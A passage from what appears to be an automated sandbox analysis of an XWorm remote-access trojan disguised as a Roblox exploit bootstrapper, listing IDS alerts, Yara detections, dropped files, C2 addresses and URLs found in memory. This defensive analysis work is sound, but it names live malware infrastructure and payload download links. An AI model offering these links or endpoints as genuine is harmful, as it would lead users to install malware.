                          Source: Binary string: System.Numerics.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: b77a5c561934e089stem.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42C5000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdbP source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49720 -> 147.185.221.24:8848
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: award-adware.gl.at.ply.gg
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.8:49720 -> 147.185.221.24:8848
                          Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                          Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                          Source: Joe Sandbox ViewIP Address: 128.116.119.3 128.116.119.3
                          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ip-api.com
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.93.27:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                          Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                          Source: global trafficDNS traffic detected: DNS query: ip-api.com
                          Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                          Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                          Source: global trafficDNS traffic detected: DNS query: nodejs.org
                          Source: global trafficDNS traffic detected: DNS query: award-adware.gl.at.ply.gg
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632
                          Source: svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS&lt;/ds:KeyName&gt;&lt;/ds:KeyInfo&gt;
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616358062.0000029107A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                          Source: svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                          Source: svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_sn
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                          Source: svchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                          Source: svchost.exe, 0000000E.00000003.1680341835.0000029107553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1647116196.0000029107553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecuri
                          Source: svchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdYBwk=
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdt:RequestedU
                          Source: svchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd#sha
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAoADIVfOz
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsde:Se
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdouroOOoD
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdthm=
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-lhr2.roblox.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                          Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, not rat.exe.0.dr, svchost.exe.2.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org
                          Source: powershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy1p
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: svchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustc
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustp
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000008.00000002.1617877847.000001D5E9C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                          Source: powershell.exe, 00000005.00000002.1478161767.000001A99FA9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1842400688.000001D2688A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Sola
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solao
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                          Source: svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                          Source: svchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwamvice
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAE2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://getsolara.dev/api/endpoint.json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://getsolara.dev/asset/discord.json
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
